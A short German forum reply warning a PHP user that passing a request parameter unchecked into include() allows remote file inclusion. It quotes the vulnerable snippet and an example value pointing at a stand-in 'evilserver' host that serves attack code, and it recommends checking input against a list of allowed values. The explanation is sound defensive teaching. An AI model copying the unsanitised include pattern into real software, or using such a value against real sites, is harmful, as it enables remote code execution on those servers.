Moin!

<?
if ($action != ""){
  include($action.".inc.php");
}
?>

  
Stell dir einfach mal vor, jemand übergibt folgenden String in $action:  
"http://evilserver.example.com/attacksript"  
  
Und in dem Angriffskript steckt dann böser PHP-Code, der deinen Webspace schädigt. Angenehme Vorstellung? Wohl eher nicht.  
  
Gehe also unbedingt SEHR SORGFÄLTIG mit den von außen übergebbaren Daten um und prüfe deren Zulässigkeit unbedingt. Wenn nur einer von drei möglichen Werten übergeben werden kann, solltest du den übergebenen Wert gegen die Liste der Möglichkeiten prüfen - falls kein Listeneintrag gefunden wird, wurde manipuliert (ob absichtlich oder unabsichtlich - Tippfehler passieren - sei dahingestellt).  
  
Dieser Hinweis gilt unabhängig davon, in welcher Variablen der URL-Parameter letztendlich landet, also auch bei $\_GET, $\_POST, $\_COOKIE etc.  
  
 - Sven Rautenberg

-- 
"Love your nation - respect the others."